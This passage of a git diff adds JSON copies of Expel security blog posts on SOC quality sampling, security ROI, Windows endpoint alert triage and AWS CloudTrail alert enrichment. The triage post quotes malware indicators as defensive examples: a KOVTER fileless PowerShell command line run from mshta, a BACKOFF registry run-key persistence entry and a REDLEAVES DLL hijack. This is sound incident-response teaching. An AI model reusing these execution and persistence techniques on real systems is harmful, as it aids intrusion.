you\u2019re going to measure How you\u2019re going to measure it What you\u2019re going to do with the measurements What you measure For a mechanical process \u2013 like those newly milled boards \u2013 it\u2019s possible to check every board using some other mechanism. For investigations that require human judgement, we realized that anything more than trivial automated QC quickly became unsustainable \u2013 in our SOC we run ~33 investigations a day (based on Change Point analysis), and can\u2019t have another analyst check over each one or we\u2019d spend most of our time chasing ghosts. (There\u2019s that darn scale and quality tradeoff.) We didn\u2019t give up though \u2013 we just figured out that we needed to be more clever in how we apply our resources. We decided on two things: We would sample from the various operational outputs (like investigations, incidents and reports). Turns out, there\u2019s an industry standard on how to do that! We would ensure the sample was representative of the total population. Following these two guidelines, we use our sample population as a proxy for the larger output population. By measuring the quality in our sample, we can determine if our process is working at a reasonable level. ISO 2859-1 \u2013 Acceptable Quality Limits (AQL) has entered the chat. TL;DR on ISO 2859-1: You make things AKA your \u201clot.\u201d AQL tells you how many items (in our case: alerts/investigations/incidents) you should inspect based on how many you produce to achieve a reasonable measure of overall quality. AQL also tells you how many defects equal a failed quality inspection. If your sample contains more defects than allowed by the AQL limit, you fail. If not, you pass. There are three inspection levels. The better your quality is, the less of your lot you have to inspect. The worse your quality is, well, you\u2019re inspecting more. Here\u2019s an AQL calculator that I\u2019ve found super helpful. Reminder: Quality is not based on what you assert, it\u2019s based on what you inspect. Let\u2019s put this into practice using some made-up numbers with our actual SOC process: On a typical day in our SOC: We\u2019ll process millions of events using our detection bot we\u2019ve named Josie . Those millions of events will result in about 500 alerts sent to a SOC analyst for human judgment. About 33 alerts will result in a deeper dive investigation; and Two to three security incidents. The image below gives a high-level visual of how the system works. You\u2019ll see that security signals come in, are processed with a detection engine and then a human takes a sample of the data and applies their expertise to determine quality. High level diagram of Expel detection system The chart below shows that we break our SOC output up into three lots. SOC output Work item Daily lot size Alerts ~500 Investigations 30 Incidents 2-3 Recall that with AQL there are three inspection levels (I, II, III). We use General Inspection Level I at Expel. Reminder: this assumes quality is already good and it\u2019s also the lowest cost. If you\u2019re just getting started, it\u2019s OK to start with Level I. If, after inspecting, you find your quality isn\u2019t that great \u2013 it\u2019s time to move up a level. Now, this is the point where you can manually review AQL tables or you can use an online AQL calculator to make things a bit easier. Let\u2019s try this with our alert lot. Our lot is about 500 alerts. My General Inspection Level is I, so I\u2019m going to set an AQL limit of no more than four defects. AQL indicates we should review 20 alerts to have a sample that\u2019s representative of the total population of alerts. If we apply the same methodology across all of our work, here\u2019s what our sampling ends up looking like: SOC output aka \u201clot size\u201d vs. sample size Work item Daily lot size General Inspection Level Sample size AQL Limit Alerts ~500 I 20 4 Investigations 30 I 5 4 Incidents 2-3 I 3 4 How you measure Once we\u2019ve arrived at a sample population, we need a way to measure it against what\u2019s considered good. As we built our process, we decided to adhere to a mantra: Our measurements must be accurate and precise We need a way to measure accuracy \u2013 it has to represent the true difference between an output and the ideal. If you\u2019re stuck on this, we found the best thing to do is try to convert whatever we were looking at into a number. For example, if you need your report to have high-quality writing, try a grammar score rather than relying on judgements (\u201cthe author\u2019s use of metaphor was challenging\u2026\u201d). In addition to being accurate, we need measurements to be precise. In other words, it needs to be reproducible \u2013 we work in shifts and if one shift is consistently easier graders, it\u2019s going to cause a problem. For us, that\u2019s where the QC check sheet came in. A QC check sheet is a simple and easy way to summarize things that happened. Think about your car\u2019s safety inspection. After the super fun time of waiting in line, the technician walks through a series of specific \u201cchecks\u201d and collects information about defects detected. Wipers? Check! Headlights? Check! Brakes? Doh! If all things check out, you pass inspection. If your brakes don\u2019t work (major defect), you fail inspection. Like a car inspection at an auto shop, our team performs an inspection; the inspector will follow a series of defined checks and the outcome of each check will be recorded and scored. If you\u2019re wondering what our SOC QC check sheet looks like, you can go and grab a copy at the end of this post. Putting it all together We have our sample size. We have our QC check sheet. But how do we go about randomly selecting our sample? A Jupyter notebook of course! We use the python pandas library to draw samples at random. We collect these samples from work that happened during the day and night hours. We perform quality inspections every day. Let\u2019s walk through one: We open our Jupyter quality control notebook and select which day\u2019s work we want to inspect. We record the inspector, smash the \u201cStart Quality Check\u201d button and then we\u2019re off to the races. Expel SOC QC check initialization step Our Jupyter Notebook reads from Expel Workbench\u2122 APIs to determine how much work we did on May 5, 2021. In the table below you can see we triaged 672 alerts, performed 67 investigations, ran down one security incident and moved 85 alerts to an open investigation. Expel SOC QC random selection step You may be thinking: but you said you typically handle about 500 alerts per day and 30 investigations. Great catch. Change-Point Analysis is your huckleberry for determining your daily mean. (More details on Change-Point Analysis here .) Then our Jupyter notebook will break our work out into three lots as seen in the image below. Selecting the button within each section will pull in the random sample size based on an AQL check sheet specific to each lot. Expel SOC QC notebook lots On May 5, 2021, we handled one security incident. Let\u2019s walk through our inspection. Going back to the image above, if we select the \u201cReview incidents\u201d button, our notebook will show the sample and the QC check sheet specific to that class of work. In this case, we\u2019re looking at incidents. Expel SOC QC incident check sheet Our QC check sheet is focused on making sure we\u2019re following the right investigative process. Did we take the right action? Did we populate the right remediation actions? Did we zig when we should have zagged? When a defect is found, we remediate the issue, record it and then trend defects by work type. If we exceed a certain number of defects for that day, we fail based on AQL. What you\u2019re going to do with the measurements If we imagine this QC thing as a cycle, what we\u2019re trying to do is (a) measure the quality, (b) learn from the measurements and (c) improve quality. In order to do this, we decided we needed our quality metrics and process to have three attributes: The metrics we produce are digestible Our quality checks are performed daily, for every shift What we uncover will be reviewed and folded into improvements in the system So, from the process above, we can roll up our pass/fail rate as the one digestible metric, which allows us to see where we\u2019re struggling: Expel SOC quality pass / fail rate since March 2020 We then deploy technology, training and mentoring to make sure the quality and scale improve over time. In fact, our SOC quality program is a key driver in a number of recent initiatives including: Automated orchestration of Amazon Web Services (AWS) Expel alerts. We detected variance with respect to how each analyst investigated AWS activity, so we automated it. Automated commodity malware and BEC reporting. Typed input is prime for defects. As you can imagine, we detected a good number of defects in the \u201cfindings\u201d reports for our top two incident classes, so we automated them. Scale and quality both went up! Recap and final thoughts Here\u2019s a super quick recap on what we just walked through: Use ISO 2859-1 (AQL) to determine sample size. Jupyter notebooks help you perform random selection. Inspect each random sample using a check sheet to spot defects. Count and trend the defects to produce digestible metrics to improve quality. Run the QC process every 24 hours. Steal this mental model: Expel SOC QC mental model And remember: you don\u2019t have to trade quality for efficiency. We hope this post was helpful. We wrote this post because this is something that would have really helped us when we started down the path of measuring SOC quality. We\u2019d love to hear about your quality program. What works? What didn\u2019t? Success stories? We\u2019re always on the lookout for ways to improve. Download Expel\u2019s SOC QC checklist" +} \ No newline at end of file diff --git a/how-to-quantify-security-roi-for-real.json b/how-to-quantify-security-roi-for-real.json new file mode 100644 index 0000000000000000000000000000000000000000..1178d0cce6dea64784f2ea1c4f4fde95abbf0ce1 --- /dev/null +++ b/how-to-quantify-security-roi-for-real.json @@ -0,0 +1,6 @@ +{ + "title": "How to quantify security ROI... for real", + "url": "https://expel.com/blog/how-to-quantify-security-roi-for-real/", + "date": "May 10, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG How to quantify security ROI\u2026 for real Expel insider \u00b7 2 MIN READ \u00b7 GREG NOTCH \u00b7 MAY 10, 2022 \u00b7 TAGS: Company news / MDR When it comes to security, pressure from the board comes from all sides. They are increasingly concerned that cybersecurity is in proper focus. \u201cAre we secure now?\u201d \u201cWill we be later?\u201d \u201cAre we making the right investments to address our cybersecurity risk?\u201d And the big one: \u201cwhat\u2019s all this costing now and in the future?\u201d The fact is, you need to spend money to help secure your org. But spending creates additional questions. One of the biggest: how can you be at least \u201creasonably sure\u201d the investment will pay off and isn\u2019t a complete waste of time, effort, and money? The \u201cusual way\u201d of calculating cybersecurity return on investment (ROI)? You take the average cost of an incident and multiply that by how many incidents you are likely to have in a given timeframe. So if you\u2019ve got rough costs for a new technology, you can assess whether the price of it and the reduction in incidents it brings is worth the investment. To us, this sounds like a \u201cnot enough data\u201d guess. Why? There are many more factors that come into play \u2014 starting with how to measure how much a technology actually reduces the organization\u2019s risk \u2014 which makes calculating cybersecurity ROI like nailing Jello to a tree. Some things to think about: What tech do you already have that needs to communicate with the new one? How big of a lift is it to make that happen? Are you shelving a legacy product or disentangling yourself from a current tech relationship and starting a new one? What\u2019s the lift there? Your equation also must include issues at stake beyond \u201cjust money,\u201d including the potential loss of intellectual property, loss of reputation, and the disruptions to your business. You know that breaches are expensive. It\u2019s time to \u201cguess\u201d better. Think about calculating cybersecurity ROI as the start of a conversation about whether investing upfront to help prevent a big disruption outweighs the small probability of a significant breach and its ensuing costs. Arming yourself with as much data as possible (technology research) is the best way to start. Expel has a few resources, including the recently commissioned Forrester Total Economic Impact\u2122 (TEI) of Expel . This study was conducted by Forrester Consulting, a third-party research group, on behalf of Expel to help potential buyers calculate Expel\u2019s financial impact on their orgs. Through an extensive customer interview process, Forrester found that Expel customers could get a 610% return on investment (ROI) \u2014 helping them lower costs significantly and providing qualitative benefits like greater efficiency and better quality of life. Wait \u2026 our customers\u2019 cost savings are excellent and we provide other meaningful benefits \u2014 like giving them peace of mind? To say we\u2019re ecstatic to see a measurable impact on our customers\u2019 lives is an understatement. But what about ROI specifically for your org? Fair question. We\u2019ve got just the tool. We\u2019re excited to introduce our interactive ROI calculator , which gives you an estimate on your ROI if you were to choose Expel as your managed security provider. Bonus, you don\u2019t have to talk to a human first. (Although the humans here at Expel are always happy to chat .)" +} \ No newline at end of file diff --git a/how-to-triage-windows-endpoints-by-asking-the-right.json b/how-to-triage-windows-endpoints-by-asking-the-right.json new file mode 100644 index 0000000000000000000000000000000000000000..243c2012f5bd8c89f418c9c9dd44169df75f3f76 --- /dev/null +++ b/how-to-triage-windows-endpoints-by-asking-the-right.json @@ -0,0 +1,6 @@ +{ + "title": "How to triage Windows endpoints by asking the right ...", + "url": "https://expel.com/blog/triage-windows-endpoints-asking-right-questions/", + "date": "Aug 24, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG How to triage Windows endpoints by asking the right questions Tips \u00b7 7 MIN READ \u00b7 GRANT OVIATT \u00b7 AUG 24, 2017 \u00b7 TAGS: Get technical / How to Mindset over matter. As security practitioners, it\u2019s important to remember that alerts are only the beginning, not the end, of finding evil. Alerts are simply investigative leads, not security answers. To determine if they have merit, you have to interrogate them. But without a strong process, the wealth of forensic information on the endpoint can easily overwhelm an investigator or lead them astray. In this blog post, I\u2019ll explain the three parts of this investigative mindset and show you how to apply them when you triage endpoint alerts. 1. Know your indicators The first question you should ask is a little obvious but it\u2019s often overlooked: what triggered the alert? As an investigator, if you can\u2019t answer that, you\u2019re going in with your eyes closed and you run the risk (or rather likelihood) that you\u2019re not going to select the right forensic artifacts. Even worse, there\u2019s a good chance you\u2019ll draw the wrong conclusions from the artifacts you do select. One way to get the investigation off on the right foot is to create playbooks that recommend what the initial investigative step is to validate each type of detection.They should contain any IOCs (indicators of compromise) that are a part of the detection along with references to their source (whitepapers, tweets, etc.) or other related alerts. This gives analysts quick context to research the detections they encounter. Don\u2019t have a threat intel team? Or maybe your security products don\u2019t give you any explanation when they throw an alert at you. That\u2019s OK. There\u2019s plenty of open source intelligence out there. Often a quick Google search or VirusTotal lookup for interesting file names, registry keys, or hashes can provide some context to guide your next steps. But remember, context does not equal conclusions. Intelligence should only be used to guide your line of questioning. Be wary of making conclusions based solely on your search results. 2. Ask the right questions I often find that inexperienced analysts pull back the same sources of evidence, regardless of their investigative lead. Usually, it\u2019s because there\u2019s no process to guide the way they triage an alert and ensure they get a complete picture. Are you sans process? If so, I\u2019ve summarized the process I use below by distilling it down into a few questions investigators can use to triage an alert, along with evidence sources that can help answer each question. Keep in mind, though, that the list of forensic evidence is in no way comprehensive. Q: How did it get here? Determine what took place that allowed initial access to the system (but note it\u2019s not always possible to answer this). Evidence sources: Web browsing history/downloads IIS logs Service Control Manager Event Logs (EID 7045 \u2013 Service Install) Windows Security Logs (EID 4648 \u2013 Explicit logon attempt) USB Artifacts (USBSTOR, MountPoints2, MountedDevices registry keys or setupapi.log) Phishing Artifacts ( RecentDocs and TrustedRecords registry keys and Jumplists ) Q: What does it do? Figure out what the malware\u2019s host and network capabilities are including how it maintains persistence. This usually involves recovering a sample, performing some static/dynamic analysis, and/or uploading a sample to a sandbox. Evidence sources: File acquisition Directory listings Acquire AV logs Acquire process memory Active network connections (netstat) Registry AutoRuns PowerShell Operational logs Q: Did it execute? If you\u2019ve answered the previous question you know what the malware could do. The goal here is to see if the malware actually executed. This involves looking at execution artifacts for evidence that a particular binary launched, and searching for dropped files, registry keys created, and related evidence that would indicate the malware performed actions successfully on the system. Evidence sources: Windows Prefetch Application Compatibility Cache (Shimcache) Amcache.hve RecentFileCache.bcf Registry AutoRuns WMI RecentlyUsedApps (RUA) Q: Is it active? If you learn that the malware executed, the next step is to determine if the threat is still present and running regularly on the system. Evidence sources: Process listings Active network connections (netstat) DNS Cache Windows Prefetch Answering these four investigative questions should be your objectives when you triage an alert. You may not be able to get good answers for all of them \u2014 for example, determining how a piece of malware was created on a host may be impossible if it was created years ago and the forensic evidence is limited. However, you\u2019ll find that the answers you do get will quickly lead you to conclusions, and the story you can tell will be more comprehensive. 3. Understand your investigative footing Not all alerts are equal. Depending on where the evidence came from \u2014 a file, registry key, process event or log \u2014 an analyst will have significantly different investigative perspectives. To illustrate, let\u2019s use the investigative questions I outlined above to show how your perspective changes with each evidence source, and how it should steer your forensic questioning. Source #1: File Surprisingly, the presence of a file doesn\u2019t necessarily provide a strong investigative footing. While a strange binary on a host should certainly raise suspicions, it may not have executed. Before you retrieve artifacts from the host, consult any playbooks or intelligence about the detection itself to answer the question \u201cWhat does it do?\u201d. Knowing what files the malware drops and how it maintains persistence will guide the evidence an investigator seeks out to validate the threat. If available in the alert, use the NTFS timestamps for the file to establish a time window of potential activity. Below is a sample file detection using the approach I outlined above. Example from intel sourced from: https://www.us-cert.gov/ncas/alerts/TA17-117A Investigative Lead: FILE DETECTION: REDLEAVES File Name: VeetlePlayer.exe File Path: C:Program FilesWindows MediaVeetlePlayer.exe Created: 1 day ago MD5: 9d0da088d2bb135611b5450554c99672 File Size: 25704 bytes File Description: Veetle TV Player Signed: True Off the bat we don\u2019t know much about this, based on the alert alone. An inexperienced analyst might be inclined to simply acquire the file. But in this case, that would lead to unfruitful results. By looking at the intel for the REDLEAVES RAT provided by the US Cert, we see that \u201cVeetlePlayer.exe\u201d is a legitimate binary that uses search-order hijacking to import a malicious loader DLL. This DLL then loads encoded shellcode contained in a file into memory. If an investigator simply acquired the legitimate executable, investigators would have come to the entirely wrong conclusion. Here is how I\u2019d interrogate the evidence in this context: Q: How did it get here? Based on the recent creation time, we may be able to trace the initial compromise vector. Look for any suspicious logon activity prior to Windows service installation for evidence of lateral movement. Also check evidence relating to phishing documents, like RecentDocs registry keys or Jumplists. Q: What does it do? Using our understanding of how REDLEAVES behaves based on our existing intelligence, the next step is to validate that this is REDLEAVES. I\u2019d validate the threat by performing a directory listing of \u201cC:Program FilesWindows Media\u201d and look for the presence of the malicious DLL (unsigned) and the shellcode file. Also, pull a Registry AutoRuns listing to see if the binary has been made persistent. Q: Did it execute? On a workstation, pull Windows Application Compatibility Cache and Prefetch. This will help identify if and when \u201cVeetlePlayer.exe\u201d has executed on the host. Q: Is it active? Based on the recent creation time, I\u2019d expect this backdoor is likely active in memory. To check, I\u2019d pull a process listing with network connection and the DNS cache on the host to validate. Source #2: Registry Registry alerts indicate that something has happened. Registry keys don\u2019t create themselves. So, if you\u2019re looking at an obscure key that a malware family uses, it\u2019s likely the host was infected at some point. While registry detections answer, \u201cDid it execute?\u201d, they often leave you with less of a grasp on \u201cWhat does it do?\u201d because you\u2019re left without binary metadata. Below is an example of how I\u2019d apply the investigative mindset to a registry detection. Example from intel sourced from: https://www.us-cert.gov/ncas/alerts/TA14-212A Investigative Lead: REGISTRY DETECTION: BACKOFF Registry Key: HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun Registry Value: Windows NT Service Registry Data: %APPDATA%AdobeFlashPlayermswinhost.exe Last Modified: 30 days ago From the registry detection we know that something executed to create this registry key. Now, we need to figure out if the referenced binary is evil and what it can do. By looking at the information provided by the US Cert, we can see that this detection is intended for PoS malware that creates two output files within the directory \u201c%APPDATA%AdobeFlashPlayer\u201d. Given this information, here\u2019s how I would proceed with my questioning. Q: How did it get here? Evidence for this may be scarce based on the last modified time of the registry key. I\u2019d look for Windows logon events around the last modified time of the registry key, specifically relating to Remote Desktop solutions based on the threat briefing. Q: What does it do? To figure this out, I\u2019d acquire the referenced binary \u201c%APPDATA%AdobeFlashPlayermswinhost.exe\u201d to see if it\u2019s still present on the host along with a directory listing of \u201c%APPDATA%AdobeFlashPlayer\u201d to validate whether output files have been created on the host. Q: Did it execute? A registry run key has been created, so we know something has executed on the host. Q: Is it active? I\u2019d run a process listing with network connections and retrieve the host DNS cache to look for signs of current activity. Based on the last modification of the registry key, understand that this could be a long shot. Source #3: Process Process alerts put investigators on a relatively strong investigative footing. A process event tells you both that a binary has executed and that it\u2019s active. Plus, you get metadata about the binary. Again, before you retrieve artifacts from the host, make sure to consult any playbooks or intelligence containing information about the detection itself so you can better answer \u201cWhat does it do?\u201d and refine your line of forensic questioning. Below is an example of what that would look like. Example can be found at: https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/ Investigative Lead: PROCESS DETECTION: KOVTER Process Name: powershell.exe Process Arguments: C:WindowsSystem32WindowsPowerShellv1.0powershell.exe iex $env:ksktr Parent Process Name: mshta.exe Process MD5: 097CE5761C89434367598B34FE32893B User: CORPAlice Start Time: 30 minutes ago Open source research tells us that KOVTER is \u201cfileless\u201d commodity malware that uses environment variables and registry data to store script interpreter commands that contain embedded shellcode. Given this information, here\u2019s how I would proceed with my questioning. Q: How did it get here? Pull web history for the user \u201cAlice\u201d, along with artifacts related to any phishing attempts. Q: What does it do? We have a general understanding of what it might do from the open source intel. So let\u2019s pull the registry key, HKLMSystemCurrentControlSetControlSession ManagerEnvironment, containing system environment variables to see where variable \u201cksktr\u201d could be storing powershell commands. Also I\u2019d look at Registry AutoRuns to validate that persistence is still intact. Q: Did it execute? This one\u2019s easy. If it\u2019s a process event, that means the binary is running in memory\u2013 so it must have executed. Q: Is it active? This one\u2019s also easy. If it\u2019s a process event, that means the binary is running in memory \u2014 so it must be active. I\u2019d check network connections for additional evidence. \u2014 Remember folks, detection is only half the battle. Good investigators are separated from great ones by the questions they ask. Hopefully this post has encouraged you to think about your own investigative mindset when you approach alerts. The key is to understand that all alerts are not made equal. Each provides unique investigative context. And by consulting intel resources before you extract forensic artifacts you\u2019ll develop a more efficient line of questioning." +} \ No newline at end of file diff --git a/how-we-automated-enrichments-for-aws-alerts.json b/how-we-automated-enrichments-for-aws-alerts.json new file mode 100644 index 0000000000000000000000000000000000000000..688e534f382b5bddddd45c59c119783c7f6c9fde --- /dev/null +++ b/how-we-automated-enrichments-for-aws-alerts.json @@ -0,0 +1,6 @@ +{ + "title": "how we automated enrichments for AWS alerts", + "url": "https://expel.com/blog/power-of-orchestration-how-we-automated-enrichments-aws-alerts/", + "date": "Aug 18, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG The power of orchestration: how we automated enrichments for AWS alerts Engineering \u00b7 8 MIN READ \u00b7 BRITTON MANAHAN \u00b7 AUG 18, 2020 \u00b7 TAGS: Alert / Cloud security / Framework / Get technical / Managed security If you\u2019ve read a post or two here on our EXE Blog, it shouldn\u2019t come as a surprise that we\u2019re big on automation. That\u2019s because we want to help analysts more efficiently, quickly and accurately determine if an alert requires additional investigation. Automating repetitive tasks not only establishes standards, it also removes the monotony and cognitive load in the decision making process. And we have the data to back that up. (Check out our blog post about how we used automation to improve the median time it takes to investigate and report suspicious login activity by 75 percent.) Understanding why we do it might be easy. But what about how we do it? Let\u2019s dive into that. We never automate until we fully understand the manual process. We do that through the Expel Workbench , which records all the activities an analyst undertakes when investigating an alert. We can inspect these activities, looking for common patterns and bring a data-driven focus to our automation. Follow @cyberpug010 In this post, we\u2019ll dig into how we automated enrichments for Amazon Web Services (AWS) alerts. Fun fact: this was the first task I was given when I started working at Expel. (Hey, I\u2019m Britton, a senior detection and response analyst here at Expel.) We\u2019ll explore the logic deployed by our automated IAM AWS enrichments. Also, I\u2019ll share our approach to developing AWS enrichments and the implementation of the enrichment workflow process. You\u2019ll walk away with some insights into particular AWS intricacies and how you can implement your own AWS enrichments. Automating AWS IAM enrichments When we create these new enrichments, we need to first define the questions that the associated user will need to ask when determining if an AWS alert is worthy of additional investigation. Here are the questions we came up with: If the alert was generated from an assumed role, who assumed it? Did the source user assume any roles around the time of the alert? What AWS services has the user historically interacted with? Has the user performed any interesting activities recently? Has this activity happened for this user before? All of these questions can be answered by investigating CloudTrail logs, which maintain a historical record of actions taken in an AWS account. Expel collects, stores and indexes most CloudTrail logs for our AWS customers to support custom AWS alerting and have them readily available for querying to aid in triage and investigations. Note that we also collect, store and index GuardDuty logs for generating Expel alerts. These questions all feed into an enrichment workflow (see the downloadable diagram at the end of this post) that helps our team make quick and smart decisions when it comes to triaging alerts. You\u2019ll notice that this workflow supports AWS alerts for either CloudTrail or GuardDuty logs. Now I\u2019ll walk you through how we approach answering each of these questions and share my thoughts on what you should keep in mind when creating each enrichment. If the alert IAM entity is an assumed role, what\u2019s the assuming IAM entity? If an AWS alert was generated by an assumed role, it\u2019s important to know the IAM principal that assumed it (yes, role-chaining is a thing) and any relevant details related to the role assumption activity. In the life cycle of an AWS compromise, a threat actor may gain access to and use several IAM users and roles. Roles are used in AWS to delegate and separate permissions and help support a least privilege security model. A threat actor\u2019s access might begin with an initial user that is used to assume roles and execute privilege escalation in order to gain access to additional users and roles. It\u2019s critical, but not always simple, to know the full scope of IAM entities wielded by an attacker. For command-line, software development kit (SDK) and SwitchRole activity in the Console, we can answer this question with the userIdentity section of CloudTrail logs which contain the IAM principal making the call, including the access key used. When a role is assumed in AWS, temporary security credentials are granted in order to take on the role\u2019s access permissions. CloudTrail logs generated from additional calls using the temporary credentials (the assumed role instance) will include this access key ID in the user identity section. This allows us to link any actions taken by a particular assumed role instance and resolve the assuming IAM entity. The latter is done by finding the matching accessKeyId attribute in the responseElements section of the corresponding AssumeRole CloudTrail event log. It\u2019ll look something like this: Matching AccessKeyId activity to its corresponding AssumeRole Event Not so fast \u2013 there\u2019s other use cases While it would be great if this was all the logic required, there\u2019s an additional use case for roles that needs to be considered: AWS SSO. Federated users are able to assume roles assigned to them by their identity provider. This federated access system also provides the ability for federated users to login to the AWS Console as an assumed role . We often see assumed roles as the user identity for ConsoleLogin events when SSO is configured through SAML 2.0 Federation, but it can be performed using any of the AssumeRole* operations to support different federated access use-cases. The following diagram provides a high-level summary of the steps involved in this process: AssumeRoleWithSAML console login process The reason this process is significant is that actions taken by the assumed role in the console will use a different access key than the one in the associated AssumeRoleWithSAML event. Despite this, the corresponding AssumeRole event for this type of federated assumed role activity can still be located. Evaluating returned events Following the logic shared in the AWS blog post, \u201c How to Easily Identify Your Federated Users by Using AWS CloudTrail ,\u201d all recent AssumeRole* (that * is a wildcard) events for the role with a matching role session name are collected. The returned events are then evaluated in the following order to determine the corresponding AssumeRole* log, with the matching logic provided to the user for clarity: If one is available in the Alert source log, is there an event matching the access key ID? If one is available in the Alert source log, is there an event time matching the session context creationdate? If there is not a match for an access key ID or session creationdate, then use the most recent AssumeRole* event returned by the query. This is what we see in the Expel Workbench: Assumed role atep back enrichment output By the way, the robot referenced here is Ruxie . Did the alert IAM entity assume any roles? By including both successful and failed role assumptions, we can also see any brute force attempts to enumerate roles a user has access to. The status message of a failed AssumeRole event is used to determine the target role when a call to AssumeRole failed. Failed AssumeRole errorMessage Assumed roles enrichment output Why do we ask this question? Because it gives analysts insight into any suspicious activity involving role assumption. Determining how the role was assumed Determining how the IAM role was assumed can be a valuable piece of context to have in combination with the provided role ARN, result, count and firstlast timestamps. There are a few ways a role is typically assumed: SAML/Web identity integration AWS web console AWS native services CLI / SDK The logic is conducted in the following steps: SAML or WebFederation through the API event name (AssumeRoleWithSAML and AssumeRoleWithWebIdentity) The Web Console by looking the invoked by field (AWS Internal), source ip and UserAgent An AWS Service by looking at the invoked by field If none of the first three criteria were matches, then the interface is determined to be the AWS CLI or SDK In order to support successful and failed calls, recent AssumeRole* events are collected for the user associated with the alert regardless of authentication status code. The query used to gather AssumeRole* events for this enrichment will vary slightly depending on whether the source alert user is an IAM user or assumed role. Keep in mind that this particular workflow is also \u201crole aware.\u201d This means that additional logic is applied when gathering relevant IAM activity. When looking at AWS alerts based on an IAM user, we surface other relevant IAM activity that matches the IAM identifier. For IAM roles, we apply a filter to include roles where the session name or source IP matches what we saw in the alert. Given that roles in AWS can be assumed by multiple entities, this additional filter helps ensure that relevant results are being retrieved. What services has the alert IAM entity interacted with? Answering this question provides Expel analysts with a high level summary of the AWS services the IAM entity has interacted with in the past week. With over 200 services and counting, this enrichment helps provide information about both the type of activity the IAM entity is involved in and at what frequency. This enrichment isn\u2019t intended to act as a singular decision point, but rather help provide a simple summary of what services are in scope for the IAM entity in terms of actual interaction. When an alert moves into an investigation for a deeper dive, it also provides information on AWS services that the IAM recently interacted with that would be highly valuable for a potential attacker (EC2, IAM, S3, SSM, database services, lambda, Secrets Manager and others). Additional context applied in tandem with this enrichment can help us gather more insights, like an account used by automation deviating from the normally used services. To determine what services a user interacted with, all of the principal\u2019s CloudTrail events over the previous week are queried. The total of each unique value is calculated to determine counts for each AWS service the alert user interacted with. Interacted services enrichment output Has the alert IAM entity made any recent interesting API calls? We define interesting API calls to be any AWS ApiEvent that doesn\u2019t have a prefix of Get (excluding GetPasswordData), List, Head or Describe, or have a failed event status. Having details on these types of activities is critical in determining if an alert is a true positive. After a threat actor gains access into an AWS account, they\u2019re likely going to perform modifying API calls related to persistence, privilege escalation and data access. Some prime examples of modifying calls are AuthorizeSecurityGroupIngress, CreateKeyPair, CreateFunction, CreateSnapshot and UpdateAssumeRolePolicy. In our recent blog post , we noted the highly suspicious output provided by this enrichment: Expel Workbench alert example While API calls that return AWS information, such as DescribeInstances, are going to be important when scoping recon activity for established unauthorized access, they\u2019re extremely common for most IAM entities. However, we do include them by capturing any failed API calls when we observe a high number of unauthorized access, notably when it\u2019s first gained for an IAM entity and a threat actor is unfamiliar with its permissions. They may be attempting to browse to different services in the console or running automated recon across services that they don\u2019t have required permissions. How does the alert activity align with historical usage for the IAM entity? Lastly, we need to evaluate whether this activity is normal for this IAM entity. To answer this question, we first need to decide on the window of time that makes up \u201cnormal activity.\u201d We found that going back two weeks, while skipping the last 12-hours of CloudTrail activity, provides a sufficient historical view while also reducing the likelihood that we show our analysts data tainted by the recent activity related to the alert. Within the window of time we lift all API calls for the user in question along with their associated user agents and IP addresses across the two weeks. This is when we look to CloudTrail. We pull out activity from CloudTrail that matches an ARN or principal ID, we use different logic for assumed rules which we previously discussed. In order to summarize this data and compare the access attributes, we slice and dice it into the following views: How many times has the IAM entity made this API call from the same IP and user-agent? (GuardDuty based alerts will be compared on the IP only because they do not contain user agent details.) What IPs and user-agent has this IAM entity historically called this API with? What IPs and user-agent has this IAM entity historically used in all of its API calls? The data comes out looking like this in our Expel Workbench: This powerful enrichment allows our analysts to quickly understand if this activity for an IAM entity is common and how they interact with AWS services. User-agents associated provide useful insights if certain service interactions for an IAM entity are typically console based, via the AWS CLI or with a certain type of AWS SDK. While a threat actor can easily spoof user-agents, aligning unauthorized access with an IAM entity\u2019s historical activity is a much tougher task. Parting thoughts and a resource for you Rather than having analysts repeatedly perform tedious tasks for each AWS alert, these enrichments empower their decision making while simultaneously establishing standardization. The enrichment outputs work in tandem to provide a summary of both relevant recent and historical activity associated with the IAM entity to answer key questions in the AWS alert triage process. Below is the workflow I walked you through in this post. Feel free to use it as a resource when assessing how CloudTrail logs can help automate AWS alert enrichments in your own environment. If you have questions, reach out to me on Twitter or contact us here . We\u2019d love to chat with you about AWS security." +} \ No newline at end of file diff --git a/how-we-built-it-alert-similarity.json b/how-we-built-it-alert-similarity.json new file mode 100644 index 0000000000000000000000000000000000000000..c04c8e595f2a8d3dff6909d0ab4f2e4279adda11 --- /dev/null +++ b/how-we-built-it-alert-similarity.json @@ -0,0 +1,6 @@ +{ + "title": "How we built it: Alert Similarity", + "url": "https://expel.com/blog/how-we-built-it-alert-similarity/", + "date": "Aug 15, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG How we built it: Alert Similarity Security operations \u00b7 7 MIN READ \u00b7 DAN WHALEN AND PETER SILBERMAN \u00b7 AUG 15, 2022 \u00b7 TAGS: Tech tools TL;DR Our Alert Similarity tool lets us teach our bots to compare similar \u201cdocuments\u201d and suggest or recommend a next step, freeing up our analysts. Here\u2019s a walk-through of how we developed it. In this post, Dan Whalen and Peter Silberman walk you through how we developed it. Hint: the process begins with an informed hunch and ends with analysts freed up to do more of what analysts do best. Since the beginning of our journey here at Expel, we\u2019ve invested in creating processes and tech that set us up for success as we grow \u2013 meaning we keep our analysts engaged (and help them avoid burnout as best we can) while maintaining the level of service our customers have come to expect from us. One of the features we recently built and released helps us do all of this: Alert Similarity. Why did we build it and how does it benefit our analysts and customers? Here\u2019s a detailed look at how we approached the creation of Alert Similarity. If you\u2019re interested in trying to develop a similar feature for your own security operations center (SOC), or learning about how to bring research to production, then read on for tips and advice. Getting started In our experience, it\u2019s best to kick off with some research and experimentation \u2013 this is an easy way to get going and start identifying low-hanging fruit, as well as to find opportunities to make an impact without it being a massive undertaking. We began our Alert Similarity journey by using one of our favorite research tools: a Jupyter notebook . The first task was to validate our hypothesis: we had a strong suspicion that new security alerts are similar to others we\u2019ve seen in the past. To test the theory, we designed an experiment in a Jupyter notebook where we: Gathered a representative sample set of alerts; Created vector embeddings for these alerts; Generated an n:n similarity matrix comparing all alerts; and Examined the results to see if our hypothesis held up. We then gathered a sample of alerts over a few months (approximately 40,000 in total). This was a relatively easy task, as our platform stores security alerts and we 